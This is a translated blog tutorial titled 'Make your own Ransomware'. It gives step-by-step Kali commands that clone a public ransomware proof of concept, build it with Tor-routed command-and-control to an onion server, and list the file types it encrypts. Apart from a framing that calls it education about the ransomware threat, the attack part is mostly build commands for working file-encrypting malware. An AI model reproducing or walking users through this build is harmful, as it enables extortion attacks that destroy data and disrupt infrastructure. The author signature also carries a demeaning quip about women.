Make your own Ransomware

Ransomware is fast becoming the most important form of malware affecting our digital systems. Companies around the world are being hit by various forms of malware, including a new variant, Snake, designed specifically for SCADA/ICS systems.

Colonial Pipeline in the US was shut down for nearly a week before paying a $5 million ransom, demonstrating the risk this ransomware poses to a nation's industrial systems and infrastructure. Recently, the major American insurance company CNA admitted to paying a ransom of 40 million dollars! No wonder ransomware developers are getting more creative and malicious, ransomware pays!

ransomware

 

To better understand how ransomware works, let's build our own ransomware from a Proof of Concept (POC) available from mauri870 on github.com. He developed this ransomware as part of his academic program and it is not designed for malicious purposes, but rather to help us understand how ransomware works. Like the new variant, Snake, and a growing number of malware strains, the malware is written in Golang.

The malware encrypts files in the background with AES-256-CTR and uses RSA-4096 to secure data exchange with the server. This ransomware is very similar to Cryptolocker, one of the most successful ransomware attacks in history.

Step #1: Download and install them Binaries

The first step is to run Kali and make sure golang is installed. If not, download it from the Kali repositories by entering,

kali > sudo apt install golang

Then you will need to login as root user.

kali > sudo su -

rans

Now create a directory for the binaries. In this case, I simply named it “git”.

kali >mkdir git

Then change directory (cd) to that directory.

kali > cd git

Then download the binaries from github.com.

kali > git clones https://github.com/mauri870/ransomware

rans0

Step #2: Extract GO variables

Next, we need to set some variables to point the binaries and GO to the appropriate directories.

rans1

Step #3: Build the source code dependencies

Now, with the variables set and exported, we need to create the dependencies. Navigate to the new directory, ransomware, and type make deps.

kali > cd ransomware

kali > make deps

rans2

Step #4: Build the source code with options

Now that we have completed it deps make, we can start building the source code. In our case, we will use a few options.

First, we want to use ToR to encrypt our communications over the ToR network.

USE_TOR=true

Second, we want to use our server at hackersarisegtdj.onion (you can use any domain or localhost).

SERVER_HOST=hackersarisegtdj.onion

Third, we want to use the port 80 (you can use any port).

SERVER_PORT=80

Finally, we want to set the operating system for the compiles of the source code for our operating system, in this case Linux.

GOOS=linux

rans3

Our command should look something like this,

kali > make -e USE_TOR=true SERVER_HOST=hackersarisegtdj.onion SERVER_PORT=80 GOOS=linux

Now press ENTER to create your ransomware.

Step #5: Check the directory for ransomware.exe

Once the source code is generated, make a list in the ransomware directory.

kali > ls -l

rans4

Now, navigate to the bin directory.

kali > cd bin

rans5

Here, you will see ransomware.exe, server and unlocker.exe.

Step #6: Consider the types of files to encrypt

If you want to see what types of files this ransomware will encrypt, go to the cmd directory and open it common.go

kali > cd cmd

kali > more common.go

rans6

Here, you can see the file extensions that this ransomware aims to encrypt when executed.

Summary

Ransomware is perhaps the biggest threat to our digital systems right now. As the Colonial Pipeline attack clearly demonstrated, almost everyone is vulnerable and if SCADA/ICS systems are compromised there can be significant financial and infrastructure impacts!

This ransomware POC will help you better understand ransomware as a threat and check if your systems are vulnerable to such an attack.

In the second part of this series, we will test the ransomware on a Windows VM.

 

iGuRu.gr The Best Technology Site in Greecefgns

every publication, directly to your inbox

Join the 2.098 registrants.
Ransomware

Written by Anastasis Vasileiadis

Translations are like women. When they are beautiful they are not faithful and when they are faithful they are not beautiful.

Leave a reply

Your email address is not published. Required fields are mentioned with *

Your message will not be published if:
1. Contains insulting, defamatory, racist, offensive or inappropriate comments.
2. Causes harm to minors.
3. It interferes with the privacy and individual and social rights of other users.
4. Advertises products or services or websites.
5. Contains personal information (address, phone, etc.).